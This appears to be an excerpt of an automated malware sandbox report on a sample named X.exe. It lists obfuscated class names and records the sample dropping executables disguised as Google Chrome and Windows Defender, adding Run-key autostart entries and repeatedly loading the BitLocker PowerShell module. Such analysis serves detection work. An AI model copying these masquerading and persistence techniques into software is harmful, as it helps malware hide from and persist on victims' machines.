                        Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csHigh entropy of concatenated method names: 'DAd6MY6WE4amuhxrr4rf7HcKOjmPHzihO08yso7tjrHGipjdfQJGte2kNfYt1A', 'EEG2usG8WiBmb3SmuxCcnsQ3osy3y3GDWYkPji0Al1v1JWS0sQRz09IittLfuX', 'QcKEpexPmpox3XOwz4Bl7riUjiPtDwWUxZWYZQtYskm3cKI0ruZMF5g8k670ow', 'WZ7ktBjfrsh68udUUPkZrVhR4WMHREcWaGCfr20GIw65JCQmUgxeG5HrXJmZkf', 'eORZ7fjqhZzG3pzpIn4alL1aoCtIhWEKGQF2JVYzoSGJgi5OzYLKqqSJ1HmMG7', '_553psPh1t5SncNT6ckbKASBJC8uq3fDBHTJIabfU3j1zKoozq4Ci7UzzSCmJtI', 'SyFv2P5XoehdJnT219CeBvc978z1Ho9JrjfROxl1zcFauUtGBjZQ1P8EaFitC0', 'HJO9Xmz1UIQBlQ0JBoV3uUz1irYdtjXjyH0WW2hMdPtDQWgMpG6xP3YF0EoIsD', 'mWcZIDE7MfG3T6MrBrPQiHWeMnLjdXzRv8PqZkTfI3o1E85R1ZFEtHbb8QiUL4', 'hXogqRoM3BqP35AogVfb4qDe4JHRqCjxysRympSYAy0C5Saj7YkhHXjHU0FZYg'
                        Source: Windows Defender.exe.0.dr, WqBFPPAGdP3qekKnUXbSbMnJQkYEWq6EDn6c9pYZqk7IrAascLDqgnmAgB4ND2.csHigh entropy of concatenated method names: '_2YF2CRCsDxdnPdsPBchoEhwDZKc2AXV8hIOv01TvH6OQlY4T1VOIp7Tkpf2sST', 'izfsM6M5EJ9022yy2GhiMa4Bwnc097KT7AhqxNHBKX7zq8jK6gCmwgw3KdQKda', 'Ux2rE57wFUIxDfwqfnBFCGFSB0GjwBtVP29hwIjLDU1S9quzDBNA22Lay2S0JK', '_43Lx3rAdBh2j4nWOx656HHtCbrZ1PdRnus0reiTUGQoGpicRD8iPa9pXSiZJOc', 'Z13RptwCW6XMeTAkZkkKdm9kNxgi9iKJlLM8IF79bjsu2BhrUZT1siGtlJ4BwO', '_6Q2P9IWxjqddZPGIaZe7mUWnyZmJKvHhjKz91sMVMlcYij9rq4vXtUogf7WrHl', 'X68ePNrQwDbQ8uqQNDHJSitBmeJXe2Q49tAB0TGy72VGUASLGdoz4QZzKHzrgS', '_4VLeHC1i6LkyVH2oQRjg5pHqg89lv7hXZdrnn3ceAR7VmVTgNPZTSsprslXefR', 'nm0e3gZXlCPxo4CZhSxRNAuslaHN5n2q5GASCv78CCyarQHpdJprQ9neptRq0e', 'Vmyuxdcefk6376V9aadd6WNzN74pa5hWPfAoVWk8dTKIrHIFiZGcxW4mxtNlkc'
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.csHigh entropy of concatenated method names: 'JoRZgwYRrib0pzhpbwWuCtzXsDVKwaWx5tO0u2n7d2Cz2N5q28xKD8Fwiqx4STiG0XvtWrH2LhOU1', 'btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac', 'ugnFlO8xTqB6vzX4WBwVisSRqh5O5nGNDs3hF8G8QzWX8KfWJpJ6ZFoFuLNjzXlAL7ehRPDMozBR1', 'b7N61fbBnHn379Cg8KG40J7wXB15pCeuevw12h2z463IzZDO9oFoHQcxWRzgKeg6Sj8hhRpGhSOaK', 'KElHQzROcJDUxi5j7UiI8pcLCBOq32DagRpElG4rBN4kpdWNsJamX8yMLUkIqoTrKuS2oYHzR29fo', 'zJENyi6rDFsfvR2PuqsNpRvB0DB3RMi6deOtdOSMdhaBI7Iwv18yYOQSgB3RrlSmWhJHq0PDGfQem', 'enY8qBECWHWHiOg0sJlf5zeZ6a6HQ7dtubz2ewvOScb8ZuTBjUEMAMVrwY29V6ThmbdmOlKDjip5V', 'ndjhIoTbd7FTL4aAH7NOjBb6yoQNNVPtuVkyYeqawMbmsbxyqaY7WBC8lEQ8sWtPZROnieYwkS8CT', '_7qlab1dNPzWfuJE6nU9nYteKoAIV5Hl3bR2emlAtQmjm4Q33fpzxH7Vob9GFwcoBiQsdKh7FcPx7r', 'om2e3sWjhmFSXj6ueB3p2lrHh3loqJI3Ln3FYvLU8zxsAizAWP1FAwqU5fQLtWJ1Fp4gz7atHLzFy'
                        Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csHigh entropy of concatenated method names: '_36Iu8s60bxeFR4yMJVHnKU3HH5G0XdCkYGRvNxeusm2xRkTCirth7MIl3bEYMLRwcgVbXbYXWzRJj', 'faomJDQTH9JfrQdsdIlJKfaYbhf3qszNtTnzmUj4976tVVM5Y09H9aNvYFx3TnCXKgLYGVS0lMNLU', 'rkDeZ2n9YEpjTXkJxDoMHTqWF5YQd0ylDMfuTpp5s3RqbkwPhJeNuKgSA415fXhpW68YBHy6Ymcge', 'bHYmEjJ7sdLajo2keOL4u3oa4NrZ9hWJZht8YVkxC2ecvLJErDhtjiRJpCyxpalQXR3elrvDqcgLe', 'ln6UL6yiXM4T1Pr6d3btbvrjL9SoiNilXgU9dDYgetX8ow3FRkWwlwOEaLaToOsql87Je9Y4zZPkt', 'dqW1HlDiGOIQY2sX2VquBfHHMmw6Iu3xtqqcvf3AoUZDJwuOrWVbqgy1qwESKzJ2lJZ3aU0tw6J6C', 'no09akK38j3bIvQNA4Wdv7ufwBUbJ93yyNZghYNkS4ACJlXfxQjAzpXfgczhJ5ArkYZ6gwbvXjSNB', 'EBzFOEVL98ZjzRwTm8lKAdFIiSXYqMGmzGaBjdj0VkZIpSt5tG7a3tBb7LUAIMT7ainpEqxxZMwJ0', '_6EjaJhzY4Gaveg0ui8NYtJg97g738DxWHUEsjKOSVPIJNkk7ze8aJ00bLYqNIMYIkiaqs2WYsOwPU', '_5bUJBXaOgvlMv64mzSubcFb8PqbAGAT8inlazolutMv5ocpXlyla3VzKWXSfp1pZCpEzynoqnlhjb'
                        Source: Windows Defender.exe.0.dr, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csHigh entropy of concatenated method names: 'WwjisSxxDCIbYcd4Y4UsqmXSlLzy6oLoIqOCTMWAInrkF', 'bBheXXcZoHVHxH3bBwr4aiknrJ30F2bql9MOkfWOgWaTq', 'Zdz9Y1bCXi8V72fSYkM8d7sniuRdX542x8pAEt3CeMF9j', 'yXMXIg1VptpW8byLQs5HSkP1TA0h1hAEQiHbQSes2bmcp', 'I2YmHmS08pAbFmzOSBH8Y9cTmI9CWatYj4soluOsJsGYz', 'LVuZSiiDv5SFtOV7OLqTzSGpKYqkYtH4XZd8ll22xBt6P', 'D6tgcK1HEP2IGjUVuhog1CaWcVSXFyYs8oDUuBWgoKCPK', '_32gxo0e19sbzb3vOpQ77zPrQGLg0R87ydpGd041Mfbvm8', 'WZylfD2CEeMMaIvgBNUQv7gc2RbHrrLbHNWRRmPYb6aSw', 'lZyYSscCiEU4lOIVItSVV7ZuAnLoEt96sL8470xdo95Jf'
                        Source: Windows Defender.exe.0.dr, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csHigh entropy of concatenated method names: 'uAIdma4NR8QqGZMhHTp2pkwIUASRT1s5TCCMoALNGGqZUcAQgjPmEfsnMYfpcU', 'E8guj0wkTXSDi5PFQB7VFk', '_2BlW37vOQ5lBjwqupApYeu', 'O3m6VbhYCCdK6SVfSdZECU', '_46xAuc1Pk0nvKAyw2iwSns'
                        Source: Google Chrome.exe.0.dr, jrpcTEvwrHLqRyJr.csHigh entropy of concatenated method names: 'n6zY7SAVCFHSUas0', '_5u90BQKmyRZ1eHyk', '_4ayTVWlBE9zPll85', 'v0TUPDCgCertO9ISBLj6Ks5ySm6sXd2gqmjV6C0QA1xeZnAk', 'XX9gKT0BQjmjplVu8C2b36iW2oCp1Ec9r24dBqV8rtgoH1Gc', 'c1fcVHBM1Z2NZ5nEZm97YsCRoSI1Yl0RuoWo7bAjjpTMkOce', 'pVbnbXkSrLua0mWOAd5y9PZASCo6xbf6QYuvIe30J98rhPB5', 'sfJ1PnqihDg0YYH5j6cBfhvGOaM1DyRCLQZ7sJZvEgApEXy0', '_7sJXJem4fx1wNk8WdJJCtSnCTD7u5DRm6zGvVXzLoh8LyuhF', 'VJlh2FAsAuXJq9USNTjYzUlFGlrmJLLxkbMTl6SgVoJWVZDn'
                        Source: Google Chrome.exe.0.dr, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.csHigh entropy of concatenated method names: 'NRNaQiL45HdvDE12rlpjtHiVgewI5IY', 'oayXCFlyxRcNG8Jh2Pkem7iiL5yjIc6', '_8BbbEBAIVhrTrngXfKYzb0vuRgPJ8I9', 'gOOq3tqQTNIc3fpOeAIJvqFdGQC1N9n', 'i2Ku7FUOqzNLdb87n6XtsO8BCKeCGef', 'rTNybMCNvpLU1mzBmG8SUeZg3muzZgK', 'AtWHzfMZG1pMlUty0vIk3qVlWsuIQva', '_0SJ9Qp1ltJir7yTsoFhX5NkSSJhHOqH', '_1D1W9pj644gjadQUV2xD2YcS1Na9oU0', '_3TPmxJhS9o1EWhxsomNZ3B8jWNcoZ5G'
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.csHigh entropy of concatenated method names: '_8RdgBs8hsKc1Xchvn2E27CgOkhSFoyV', 'f9ZdtOKP4Q3DUGf2u4fXoYuntvta6B7', '_3jnBuRACGTClEVxVYkJcOgKRMf2592k', 'vylxe4g5k8nkkpbiZ6y9Scim0TIMlFk', 'QBsxGonALOQAUKA40rzlOyGY8fA6U1L', 'aVIrdjG2tf77GFHFxxrwjfZxRz5lCsm', 'uy0K927WZFwasL8hGin2hAyR9cQhS7X', 'g7BCflj5inLC0crvdd0pYUG7vWl38py', 'TnL1QraWSY95QDURwJ1lmSgxHwqLtSl', 'ogiNgCdZm7pmO643ea2GYmasMz19ncO'
                        Source: Google Chrome.exe.0.dr, w7ZIRjsvip4MF5xGsbBND80ojJ4dh5g.csHigh entropy of concatenated method names: 'Nx3F4Pq2rRNYc17giIIqq6grtK5HPJk', 'egW94Lk6guFqcb6HsOVrS1htfU7FJWB', 'h96VMbfQPnTKAdEPxf6pZMcTkXLJs6F', '_2lP6glD6EWETGQ5TMMMZC7OikS6mWmq', 'IV1Y2etqJljurSX3', 'houvz32a6Zl2mEXe', 'nSiO4tePrjSotMCz', '_6tvowFv9nogysn4q', 'ptmHhgcMISltGkT0', 'wrdSv0ILtECCEtJw'
                        Source: Google Chrome.exe.0.dr, 95IUXxLlqJejB12ZmlfVehHxTvY7hK7.csHigh entropy of concatenated method names: 'zO97l4bWsDYwEuC13Dh97PM8zPZVp2v', 'Dncea824rrtH3UkejCOtVMU4U9EZ6py', 'gm2byZWLfUE2kN5qzvM2v9bxYezko9d', 's19zmkrFCyjLRvvVKnCHrqb1AbJ2N8b', 'mxrLPLumYLJ8agiCeHFPXLD6Ji0d9J3', 'UhhkkC8ORQA2Byyil5KrSpk3uFLQ5sE', 'c3HVHtQR0OdVZZZptKkxfTMGFT1jrGc', 'L1iOuf0jbeIAVdorxYggkHQfAei9qfA', 'zjozaRMGIZQYLYnN4qTuafvEDtYVlTV', '_5wYe5ENJX5mkytI5AxE8kpKOe6RhNCO'
                        Source: Google Chrome.exe.0.dr, 1I2uDx72OuHy9A5f6b5YLHuDm6qHQgA.csHigh entropy of concatenated method names: 'hOlh9c922Gl5MoIZrC2CmOOfVnNbtlB', 'AgraGoSCMLEfiC0UJZeNawIitt4s2hk', 'MgtORkUENm79TnfisYEyYkUfxyL4jKZ', '_9G1vtUTHvRJYDfKeddJp0RzObOxrUhJ', 'oUorYDfFYsMd9dsRsZ5riV1WPnreL6V', 'lVHGLL8xKlS1OanFMALVDAkh0AFYs90', '_9wgi8v7FCwFLxwWaGzti7rsGMZqxTpO', '_9xG1VuffErxxW83pWzFHDrXS7D2fgOF', 'MjK2VGXEkI3oS4FZjPlPH7rBlKzZFSd', 'ys5YHLn03jNcqndQKYYWOunHKBcRCc0'
                        Source: Google Chrome.exe.0.dr, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.csHigh entropy of concatenated method names: 'ZY9ToOBPVEn15PRC6rbgQuqq9VXVVBE', 'va4uJ0eKytu4E2I8ZuaNh3pz2g8l8mQ', 'Spwr39kyR3vbMuWeh5EzqsQIkNICorr', 'QnD41hgm5idFCYVehTMR35VCWeWc6Wf', 'nyD2eb9EKCEb7XgB9l6QXFf6kwDo4kS', 'LTa90cdtGsRM5kIeC9iN55dXZdw8KKL', 'kiQ43LuThWeojuzbQ0ZsJTfuz2ifoMf', 'EG7GkGmbX7KDDZStQAWeI3g3zBXKfyj', 'NAgkei94MYNFuWUCVNX6t6kKhN4HACp', 'j9ev6vQA6vSMcrgBdjVDhZlT7B9BF30'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, jrpcTEvwrHLqRyJr.csHigh entropy of concatenated method names: 'n6zY7SAVCFHSUas0', '_5u90BQKmyRZ1eHyk', '_4ayTVWlBE9zPll85', 'v0TUPDCgCertO9ISBLj6Ks5ySm6sXd2gqmjV6C0QA1xeZnAk', 'XX9gKT0BQjmjplVu8C2b36iW2oCp1Ec9r24dBqV8rtgoH1Gc', 'c1fcVHBM1Z2NZ5nEZm97YsCRoSI1Yl0RuoWo7bAjjpTMkOce', 'pVbnbXkSrLua0mWOAd5y9PZASCo6xbf6QYuvIe30J98rhPB5', 'sfJ1PnqihDg0YYH5j6cBfhvGOaM1DyRCLQZ7sJZvEgApEXy0', '_7sJXJem4fx1wNk8WdJJCtSnCTD7u5DRm6zGvVXzLoh8LyuhF', 'VJlh2FAsAuXJq9USNTjYzUlFGlrmJLLxkbMTl6SgVoJWVZDn'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.csHigh entropy of concatenated method names: 'NRNaQiL45HdvDE12rlpjtHiVgewI5IY', 'oayXCFlyxRcNG8Jh2Pkem7iiL5yjIc6', '_8BbbEBAIVhrTrngXfKYzb0vuRgPJ8I9', 'gOOq3tqQTNIc3fpOeAIJvqFdGQC1N9n', 'i2Ku7FUOqzNLdb87n6XtsO8BCKeCGef', 'rTNybMCNvpLU1mzBmG8SUeZg3muzZgK', 'AtWHzfMZG1pMlUty0vIk3qVlWsuIQva', '_0SJ9Qp1ltJir7yTsoFhX5NkSSJhHOqH', '_1D1W9pj644gjadQUV2xD2YcS1Na9oU0', '_3TPmxJhS9o1EWhxsomNZ3B8jWNcoZ5G'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.csHigh entropy of concatenated method names: '_8RdgBs8hsKc1Xchvn2E27CgOkhSFoyV', 'f9ZdtOKP4Q3DUGf2u4fXoYuntvta6B7', '_3jnBuRACGTClEVxVYkJcOgKRMf2592k', 'vylxe4g5k8nkkpbiZ6y9Scim0TIMlFk', 'QBsxGonALOQAUKA40rzlOyGY8fA6U1L', 'aVIrdjG2tf77GFHFxxrwjfZxRz5lCsm', 'uy0K927WZFwasL8hGin2hAyR9cQhS7X', 'g7BCflj5inLC0crvdd0pYUG7vWl38py', 'TnL1QraWSY95QDURwJ1lmSgxHwqLtSl', 'ogiNgCdZm7pmO643ea2GYmasMz19ncO'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, w7ZIRjsvip4MF5xGsbBND80ojJ4dh5g.csHigh entropy of concatenated method names: 'Nx3F4Pq2rRNYc17giIIqq6grtK5HPJk', 'egW94Lk6guFqcb6HsOVrS1htfU7FJWB', 'h96VMbfQPnTKAdEPxf6pZMcTkXLJs6F', '_2lP6glD6EWETGQ5TMMMZC7OikS6mWmq', 'IV1Y2etqJljurSX3', 'houvz32a6Zl2mEXe', 'nSiO4tePrjSotMCz', '_6tvowFv9nogysn4q', 'ptmHhgcMISltGkT0', 'wrdSv0ILtECCEtJw'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, 95IUXxLlqJejB12ZmlfVehHxTvY7hK7.csHigh entropy of concatenated method names: 'zO97l4bWsDYwEuC13Dh97PM8zPZVp2v', 'Dncea824rrtH3UkejCOtVMU4U9EZ6py', 'gm2byZWLfUE2kN5qzvM2v9bxYezko9d', 's19zmkrFCyjLRvvVKnCHrqb1AbJ2N8b', 'mxrLPLumYLJ8agiCeHFPXLD6Ji0d9J3', 'UhhkkC8ORQA2Byyil5KrSpk3uFLQ5sE', 'c3HVHtQR0OdVZZZptKkxfTMGFT1jrGc', 'L1iOuf0jbeIAVdorxYggkHQfAei9qfA', 'zjozaRMGIZQYLYnN4qTuafvEDtYVlTV', '_5wYe5ENJX5mkytI5AxE8kpKOe6RhNCO'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, 1I2uDx72OuHy9A5f6b5YLHuDm6qHQgA.csHigh entropy of concatenated method names: 'hOlh9c922Gl5MoIZrC2CmOOfVnNbtlB', 'AgraGoSCMLEfiC0UJZeNawIitt4s2hk', 'MgtORkUENm79TnfisYEyYkUfxyL4jKZ', '_9G1vtUTHvRJYDfKeddJp0RzObOxrUhJ', 'oUorYDfFYsMd9dsRsZ5riV1WPnreL6V', 'lVHGLL8xKlS1OanFMALVDAkh0AFYs90', '_9wgi8v7FCwFLxwWaGzti7rsGMZqxTpO', '_9xG1VuffErxxW83pWzFHDrXS7D2fgOF', 'MjK2VGXEkI3oS4FZjPlPH7rBlKzZFSd', 'ys5YHLn03jNcqndQKYYWOunHKBcRCc0'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.csHigh entropy of concatenated method names: 'ZY9ToOBPVEn15PRC6rbgQuqq9VXVVBE', 'va4uJ0eKytu4E2I8ZuaNh3pz2g8l8mQ', 'Spwr39kyR3vbMuWeh5EzqsQIkNICorr', 'QnD41hgm5idFCYVehTMR35VCWeWc6Wf', 'nyD2eb9EKCEb7XgB9l6QXFf6kwDo4kS', 'LTa90cdtGsRM5kIeC9iN55dXZdw8KKL', 'kiQ43LuThWeojuzbQ0ZsJTfuz2ifoMf', 'EG7GkGmbX7KDDZStQAWeI3g3zBXKfyj', 'NAgkei94MYNFuWUCVNX6t6kKhN4HACp', 'j9ev6vQA6vSMcrgBdjVDhZlT7B9BF30'
                        Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Local\Temp\Google Chrome.exeJump to dropped file
                        Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Local\Temp\Windows Defender.exeJump to dropped file

                        Boot Survival

                        barindex
                        Creates multiple autostart registry keys
                        Source: C:\Users\user\Desktop\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows DefenderJump to behavior
                        Source: C:\Users\user\Desktop\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Google ChromeJump to behavior
                        Source: C:\Users\user\Desktop\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows DefenderJump to behavior
                        Source: C:\Users\user\Desktop\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows DefenderJump to behavior
                        Source: C:\Users\user\Desktop\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Google ChromeJump to behavior
                        Source: C:\Users\user\Desktop\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Google ChromeJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
